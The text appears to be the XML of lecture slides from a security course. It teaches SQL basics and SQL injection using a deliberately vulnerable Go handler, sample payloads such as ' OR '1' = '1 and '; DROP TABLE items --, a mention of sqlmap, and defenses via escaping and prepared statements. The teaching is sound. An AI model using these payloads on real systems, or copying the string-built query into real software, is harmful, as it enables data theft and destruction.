            <a:off x="1347300" y="3622175"/>
            <a:ext cx="4140950" cy="615600"/>
            <a:chOff x="1347300" y="3622175"/>
            <a:chExt cx="4140950" cy="615600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="317" name="Google Shape;317;p41"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4503350" y="3759000"/>
              <a:ext cx="984900" cy="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8" name="Google Shape;318;p41"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4503350" y="4068700"/>
              <a:ext cx="984900" cy="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9" name="Google Shape;319;p41"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1347300" y="3622175"/>
              <a:ext cx="32247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This statement results in two rows being deleted from the table</a:t>
              </a:r>
              <a:endParaRPr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CREATE</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="325" name="Google Shape;325;p42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is used to create tables (and sometimes databases)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6" name="Google Shape;326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aphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="327" name="Google Shape;327;p42"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5488250" y="14602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CREATE</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="333" name="Google Shape;333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aphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="334" name="Google Shape;334;p43"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5488250" y="12316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35" name="Google Shape;335;p43"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5488250" y="3524825"/>
          <a:ext cx="3532900" cy="109719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6" name="Google Shape;336;p43"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="223575" y="1469825"/>
            <a:ext cx="4194900" cy="20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CREATE TABLE cats (</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" b="1" dirty="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    id INT,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" b="1" dirty="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    name VARCHAR(255),</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" b="1" dirty="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    likes VARCHAR(255),</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" b="1" dirty="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    age INT</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" b="1" dirty="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337" name="Google Shape;337;p43"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="492325" y="3778525"/>
            <a:ext cx="4986300" cy="615600"/>
            <a:chOff x="492325" y="3778525"/>
            <a:chExt cx="4986300" cy="615600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="338" name="Google Shape;338;p43"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="339" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3717025" y="4086325"/>
              <a:ext cx="1761600" cy="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39" name="Google Shape;339;p43"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="492325" y="3778525"/>
              <a:ext cx="32247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This statement results in a new table being created with the given columns</a:t>
              </a:r>
              <a:endParaRPr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sp>
        <p:nvSpPr>
          <p:cNvPr id="340" name="Google Shape;340;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3608050" y="2049300"/>
            <a:ext cx="1509900" cy="8313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VARCHAR(255)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> is a string type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DROP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="346" name="Google Shape;346;p44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 is used to delete tables (and sometimes databases)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Syntax:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/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DROP TABLE [table]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="347" name="Google Shape;347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aphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="348" name="Google Shape;348;p44"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5488250" y="12316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49" name="Google Shape;349;p44"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5488250" y="3524825"/>
          <a:ext cx="3532900" cy="109719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DROP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="355" name="Google Shape;355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aphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="356" name="Google Shape;356;p45"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5488250" y="12316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 strike="sng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 strike="sngStrike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 strike="sng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 rows, 0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357" name="Google Shape;357;p45"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5488250" y="3524825"/>
          <a:ext cx="3532900" cy="109719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cats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58" name="Google Shape;358;p45"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="223575" y="1469825"/>
            <a:ext cx="41949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DROP TABLE bots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359" name="Google Shape;359;p45"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="501950" y="2202375"/>
            <a:ext cx="4986300" cy="615600"/>
            <a:chOff x="501950" y="2202375"/>
            <a:chExt cx="4986300" cy="615600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="360" name="Google Shape;360;p45"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="361" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3726650" y="2510175"/>
              <a:ext cx="1761600" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="19050" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="E6913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61" name="Google Shape;361;p45"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="501950" y="2202375"/>
              <a:ext cx="32247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This statement results in the entire </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" b="1">
                  <a:latin typeface="Courier New"/>
                  <a:ea typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                  <a:sym typeface="Courier New"/>
                </a:rPr>
                <a:t>bots</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en"/>
                <a:t> table being deleted</a:t>
              </a:r>
              <a:endParaRPr b="1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Syntax Characters</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="367" name="Google Shape;367;p46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--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> (two dashes) is used for single-line comments (like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#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> in Python or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" dirty="0"/>
              <a:t> in C)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Semicolons separate different statements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ourier New"/>
              <a:buChar char="○"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UPDATE items SET price = 2 WHERE id = 4;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" b="1" dirty="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SELECT price FROM items WHERE id = 4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SQL is really complicated, but you only need to know the basics for this class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8" name="Google Shape;368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Go HTTP Handler (Again)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375" name="Google Shape;375;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="1655725"/>
            <a:ext cx="6703200" cy="1262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func handleGetItems(w http.ResponseWriter, r *http.Request) {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itemName := r.URL.Query()["item"][0]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db := getDB()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:= fmt.Sprintf(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"SELECT name, price FROM items WHERE name = '%s'", itemName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row, err := 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db.QueryRow(query)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6" name="Google Shape;376;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="4533775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SELECT item, price FROM items WHERE name = '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paperclips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'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7" name="Google Shape;377;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="3556450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https://vulnerable.com/get-items?item=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paperclips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8" name="Google Shape;378;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="125552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Handler</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="379" name="Google Shape;379;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="3156250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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="380" name="Google Shape;380;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="4133575"/>
            <a:ext cx="80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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="381" name="Google Shape;381;p47"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5128700" y="2446113"/>
            <a:ext cx="3724800" cy="1029600"/>
            <a:chOff x="5128700" y="2446113"/>
            <a:chExt cx="3724800" cy="1029600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="382" name="Google Shape;382;p47"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5128700" y="3075513"/>
              <a:ext cx="3724800" cy="4002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Remember this string manipulation issue?</a:t>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="383" name="Google Shape;383;p47"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="382" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="6731300" y="2446113"/>
              <a:ext cx="259800" cy="629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Go HTTP Handler (Again)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="389" name="Google Shape;38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390" name="Google Shape;390;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="1655725"/>
            <a:ext cx="6703200" cy="1262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func handleGetItems(w http.ResponseWriter, r *http.Request) {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itemName := r.URL.Query()["item"][0]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db := getDB()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:= fmt.Sprintf(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"SELECT name, price FROM items WHERE name = '%s'", itemName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row, err := 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db.QueryRow(query)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1" name="Google Shape;391;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="4533775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SELECT item, price FROM items WHERE name = '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'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2" name="Google Shape;392;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="3556450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https://vulnerable.com/get-items?item=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3" name="Google Shape;393;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="125552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Handler</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="394" name="Google Shape;394;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="3156250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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="395" name="Google Shape;395;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="4133575"/>
            <a:ext cx="80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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="396" name="Google Shape;396;p48"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4747025" y="3010850"/>
            <a:ext cx="3440400" cy="1595100"/>
            <a:chOff x="4747025" y="3010850"/>
            <a:chExt cx="3440400" cy="1595100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="397" name="Google Shape;397;p48"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5044625" y="3010850"/>
              <a:ext cx="31428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Invalid SQL executed by the server, 500 Internal Server Error</a:t>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="398" name="Google Shape;398;p48"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="397" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4747025" y="3626450"/>
              <a:ext cx="1869000" cy="979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Go HTTP Handler (Again)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="404" name="Google Shape;404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405" name="Google Shape;405;p49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="1655725"/>
            <a:ext cx="6703200" cy="1262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func handleGetItems(w http.ResponseWriter, r *http.Request) {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itemName := r.URL.Query()["item"][0]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db := getDB()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:= fmt.Sprintf(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"SELECT name, price FROM items WHERE name = '%s'", itemName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row, err := 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db.QueryRow(query)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6" name="Google Shape;406;p49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="4533775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SELECT item, price FROM items WHERE name = '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 OR '1' = '1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'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7" name="Google Shape;407;p49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="3556450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https://vulnerable.com/get-items?item=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 OR '1' = '1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8" name="Google Shape;408;p49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="125552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Handler</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="409" name="Google Shape;409;p49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="3156250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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="410" name="Google Shape;410;p49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="4133575"/>
            <a:ext cx="80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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="411" name="Google Shape;411;p49"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5348650" y="3048550"/>
            <a:ext cx="3388350" cy="1525200"/>
            <a:chOff x="5348650" y="3048550"/>
            <a:chExt cx="3388350" cy="1525200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="412" name="Google Shape;412;p49"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5788300" y="3048550"/>
              <a:ext cx="2948700" cy="6156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This is essentially OR TRUE, so returns every item!</a:t>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="413" name="Google Shape;413;p49"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="412" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="5348650" y="3664150"/>
              <a:ext cx="1914000" cy="909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</a:t>
            </a:r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Go HTTP Handler (Again)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="419" name="Google Shape;419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420" name="Google Shape;420;p50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="1655725"/>
            <a:ext cx="6703200" cy="1262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func handleGetItems(w http.ResponseWriter, r *http.Request) {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itemName := r.URL.Query()["item"][0]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db := getDB()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:= fmt.Sprintf(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"SELECT name, price FROM items WHERE name = '%s'", itemName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row, err := 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db.QueryRow(query)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1" name="Google Shape;421;p50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="4533775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SELECT item, price FROM items WHERE name = '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'; DROP TABLE items --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'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2" name="Google Shape;422;p50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="3556450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https://vulnerable.com/get-items?item=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'; DROP TABLE items --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3" name="Google Shape;423;p50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="125552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Handler</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="424" name="Google Shape;424;p50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="3156250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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="425" name="Google Shape;425;p50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="4133575"/>
            <a:ext cx="80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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="426" name="Google Shape;426;p50"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2347975" y="2571750"/>
            <a:ext cx="3504900" cy="2001900"/>
            <a:chOff x="2347975" y="2571750"/>
            <a:chExt cx="3504900" cy="2001900"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="427" name="Google Shape;427;p50"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2347975" y="2571750"/>
              <a:ext cx="3504900" cy="10467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For this payload: End the first quote (</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" b="1">
                  <a:latin typeface="Courier New"/>
                  <a:ea typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                  <a:sym typeface="Courier New"/>
                </a:rPr>
                <a:t>'</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en"/>
                <a:t>), then start a new statement (</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" b="1">
                  <a:latin typeface="Courier New"/>
                  <a:ea typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                  <a:sym typeface="Courier New"/>
                </a:rPr>
                <a:t>DROP TABLE items</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en"/>
                <a:t>), then comment out the remaining quote (</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" b="1">
                  <a:latin typeface="Courier New"/>
                  <a:ea typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                  <a:sym typeface="Courier New"/>
                </a:rPr>
                <a:t>--</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en"/>
                <a:t>)</a:t>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="428" name="Google Shape;428;p50"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="427" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4100425" y="3618450"/>
              <a:ext cx="963600" cy="955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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="434" name="Google Shape;434;p5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SQL injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>): Injecting SQL into queries constructed by the server to cause malicious behavior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Typically caused by using vulnerable string manipulation for SQL queries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the attacker to execute arbitrary SQL on the SQL server!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Leak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Add records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Modify records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Delete records/tables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Basically anything that the SQL server can do</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="435" name="Google Shape;435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Blind SQL Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="455" name="Google Shape;455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456" name="Google Shape;456;p54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all SQL queries are used in a way that is visible to the user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Visible: Shopping carts, comment threads, list of accounts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Blind: Password verification, user account creation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Some SQL injection vulnerabilities only return a true/false as a way of determining whether your exploit worked!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Blind SQL injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: SQL injection attacks where little to no feedback is provided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Attacks become more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>annoying</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, but vulnerabilities are still exploitable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Automated SQL injection detection and exploitation makes this less of an issue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Attackers will use automated tools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462" name="Google Shape;462;p5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Blind SQL Injection Tools</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="463" name="Google Shape;463;p5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sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: An automated tool to find and exploit SQL injection vulnerabilities on web servers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Supports pretty much all database systems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Supports blind SQL injection (even through timing side channels)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Supports “escaping” from the database server to run commands in the operating system itself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Takeaway</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: “Harder” is harder only until someone makes a tool to automate the attack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="464" name="Google Shape;464;p55"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="50731"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5486325" y="3030250"/>
            <a:ext cx="3498101" cy="124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6325" y="1848133"/>
            <a:ext cx="3498100" cy="1182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 Defenses</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="471" name="Google Shape;471;p56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Defense: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t>Input sanitization</a:t>
            </a:r>
            <a:endParaRPr b="1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Option #1: Disallow special characters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Option #2: Escape special characters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dirty="0"/>
              <a:t>Like XSS, SQL injection relies on certain characters that are interpreted specially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dirty="0"/>
              <a:t>SQL allows special characters to be escaped with backslash (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\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>) to be treated as data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Drawback: Difficult to build a good escaper that handles all edge cases</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="472" name="Google Shape;472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473" name="Google Shape;473;p56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="3129625"/>
            <a:ext cx="6703200" cy="1416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func handleGetItems(w http.ResponseWriter, r *http.Request) {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itemName := r.URL.Query()["item"][0]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  itemName = sqlEscape(itemName)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db := getDB()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query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:= fmt.Sprintf(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"SELECT name, price FROM items WHERE name = '%s'", itemName</a:t>
            </a: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row, err := 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db.QueryRow(query)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 Defenses</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="479" name="Google Shape;479;p57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Defense: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t>Prepared statements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Idea: Instead of trying to escape characters before parsing, parse the SQL first, then insert the data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Usually represented as a question mark (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"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en-US" dirty="0"/>
              <a:t>) when writing SQL statements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dirty="0"/>
              <a:t>When the parser encounters the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en" dirty="0"/>
              <a:t>, it fixes it as a single node in the syntax tree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dirty="0"/>
              <a:t>After parsing, only </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1" dirty="0"/>
              <a:t>then</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>, it inserts data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dirty="0"/>
              <a:t>The untrusted input never has a chance to be parsed, only ever treated as data</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="480" name="Google Shape;480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481" name="Google Shape;481;p57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="3524325"/>
